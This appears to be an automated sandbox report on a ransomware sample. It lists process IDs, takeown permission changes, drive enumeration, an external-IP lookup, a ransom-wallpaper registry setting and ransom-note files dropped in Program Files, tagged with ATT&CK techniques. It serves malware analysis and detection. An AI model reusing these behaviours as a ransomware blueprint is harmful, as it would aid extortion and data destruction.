NWrZTmHr.exeK91plEdw.exeK91plEdw64.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exeK91plEdw.exe

pid	process
3344	NWrZTmHr.exe
8276	K91plEdw.exe
8316	K91plEdw64.exe
8200	K91plEdw.exe
8268	K91plEdw.exe
8520	K91plEdw.exe
8480	K91plEdw.exe
8892	K91plEdw.exe
8684	K91plEdw.exe
6704	K91plEdw.exe
6568	K91plEdw.exe
7444	K91plEdw.exe
7456	K91plEdw.exe
8288	K91plEdw.exe
4784	K91plEdw.exe
6540	K91plEdw.exe
7800	K91plEdw.exe
1800	K91plEdw.exe
7364	K91plEdw.exe
8032	K91plEdw.exe
4676	K91plEdw.exe
8184	K91plEdw.exe
8028	K91plEdw.exe
8172	K91plEdw.exe
8112	K91plEdw.exe
3868	K91plEdw.exe
4932	K91plEdw.exe
5720	K91plEdw.exe
5624	K91plEdw.exe
7776	K91plEdw.exe
7840	K91plEdw.exe
4340	K91plEdw.exe
6356	K91plEdw.exe
7532	K91plEdw.exe
1620	K91plEdw.exe
7968	K91plEdw.exe
6316	K91plEdw.exe
7020	K91plEdw.exe
6064	K91plEdw.exe
5536	K91plEdw.exe
432	K91plEdw.exe
7128	K91plEdw.exe
7888	K91plEdw.exe
6168	K91plEdw.exe
5592	K91plEdw.exe
6456	K91plEdw.exe
9104	K91plEdw.exe
8852	K91plEdw.exe
9192	K91plEdw.exe
8900	K91plEdw.exe
5772	K91plEdw.exe
5920	K91plEdw.exe
6632	K91plEdw.exe
4356	K91plEdw.exe
7416	K91plEdw.exe
7856	K91plEdw.exe
5696	K91plEdw.exe
5312	K91plEdw.exe
6304	K91plEdw.exe
3876	K91plEdw.exe
5424	K91plEdw.exe
3092	K91plEdw.exe
8328	K91plEdw.exe
8336	K91plEdw.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
8512	takeown.exe
3240	takeown.exe
5404	takeown.exe
9136	takeown.exe
5456
8492	takeown.exe
9116	takeown.exe
8632	takeown.exe
5732
3088
5752	takeown.exe
6060	takeown.exe
3168
7724
532	takeown.exe
7640	takeown.exe
6416	takeown.exe
6664
5508
5884
5508
8572
6536	takeown.exe
6156	takeown.exe
5364	takeown.exe
6912
7644
6968	takeown.exe
6232	takeown.exe
8252	takeown.exe
5572	takeown.exe
3876	takeown.exe
4120
1144	takeown.exe
8148	takeown.exe
8932	takeown.exe
5312
6360
6228
9204	takeown.exe
6980	takeown.exe
6940	takeown.exe
7316	takeown.exe
8596
6220	takeown.exe
7120	takeown.exe
5196
5636
6464	takeown.exe
5448	takeown.exe
8344	takeown.exe
6424	takeown.exe
8184	takeown.exe
6776	takeown.exe
5876
6236	takeown.exe
5820	takeown.exe
8804	takeown.exe
6912	takeown.exe
7864	takeown.exe
6096	takeown.exe
2388	takeown.exe
5644
8776	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe	upx
behavioral12/memory/8276-4687-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8200-6761-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8268-6763-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8520-6765-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8480-6768-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8892-6771-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8892-6770-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8684-6774-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8684-6773-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6704-6776-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6568-6778-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7456-6786-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8276-6785-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/4784-6790-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6540-6793-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7800-6795-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/1800-6798-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7364-6801-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/4676-6805-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8172-6811-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8112-6815-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/4932-6823-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5624-6828-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7840-6832-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6356-6837-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6356-6836-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7532-6839-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/1620-6841-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7968-6845-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6316-6847-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6316-6848-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/4340-6834-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7776-6830-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5720-6826-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7020-6852-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6064-6854-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/4932-6822-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/3868-6820-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8028-6809-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8184-6807-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5536-6856-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8032-6803-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/1800-6799-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8892-6797-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6540-6792-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8288-6788-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/432-6858-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7444-6781-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7128-6860-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7888-6862-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6168-6864-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5592-6867-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6456-6869-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/9104-6871-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6632-6887-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/4356-6889-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7416-6891-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6304-6896-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/3876-6897-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8328-6901-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/8328-6900-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/3092-6899-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5424-6898-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Drops desktop.ini file(s) 27 IoCs

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exeK91plEdw64.exe

description	ioc	process
File opened (read-only)	\??\J:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\T:	K91plEdw64.exe
File opened (read-only)	\??\W:	K91plEdw64.exe
File opened (read-only)	\??\X:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\U:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\N:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\S:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\S:	K91plEdw64.exe
File opened (read-only)	\??\H:	K91plEdw64.exe
File opened (read-only)	\??\K:	K91plEdw64.exe
File opened (read-only)	\??\N:	K91plEdw64.exe
File opened (read-only)	\??\P:	K91plEdw64.exe
File opened (read-only)	\??\Q:	K91plEdw64.exe
File opened (read-only)	\??\Y:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\T:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\R:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\U:	K91plEdw64.exe
File opened (read-only)	\??\Y:	K91plEdw64.exe
File opened (read-only)	\??\M:	K91plEdw64.exe
File opened (read-only)	\??\R:	K91plEdw64.exe
File opened (read-only)	\??\W:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\K:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\G:	K91plEdw64.exe
File opened (read-only)	\??\E:	K91plEdw64.exe
File opened (read-only)	\??\V:	K91plEdw64.exe
File opened (read-only)	\??\Z:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\M:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\L:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\Z:	K91plEdw64.exe
File opened (read-only)	\??\I:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\G:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\O:	K91plEdw64.exe
File opened (read-only)	\??\E:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\A:	K91plEdw64.exe
File opened (read-only)	\??\B:	K91plEdw64.exe
File opened (read-only)	\??\J:	K91plEdw64.exe
File opened (read-only)	\??\L:	K91plEdw64.exe
File opened (read-only)	\??\P:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\O:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\H:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\X:	K91plEdw64.exe
File opened (read-only)	\??\V:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\Q:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\I:	K91plEdw64.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

148 myexternalip.com

flow	ioc
148	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\0P7hyz2K.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\javafx\mesa3d.md	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\VideoLAN Website.url	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Install\{CF7C447C-1801-4EDB-B846-242A67BD0D01}\chrome_installer.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\ext\jfxrt.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\pl.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\VisualElements\PrivateBrowsing_150.png	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\jfr.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedge_200_percent.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\vi.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\security\cacerts	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\images\cursors\cursors.properties	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_CopyDrop32x32.gif	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\ext\cldrdata.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\LogoCanary.png	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\nl.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sl.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\lib\ir.idl	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\SmallLogoDev.png	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\legal\jdk\icu.md	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\he.pak.DATA	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\lua\extensions\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ka.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\legal\jdk\asm.md	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\keytool.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\jfr.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\dotnet\swidtag\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\accessibility.properties	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\am.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\asm.md	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\nb.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Advertising	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\legal\jdk\thaidict.md	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\rmiregistry.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\COPYRIGHT	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\uk.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_fr.properties	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\cs.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20240226151421.pma	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.185.17\MicrosoftEdgeUpdate.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\plugin.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\da.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
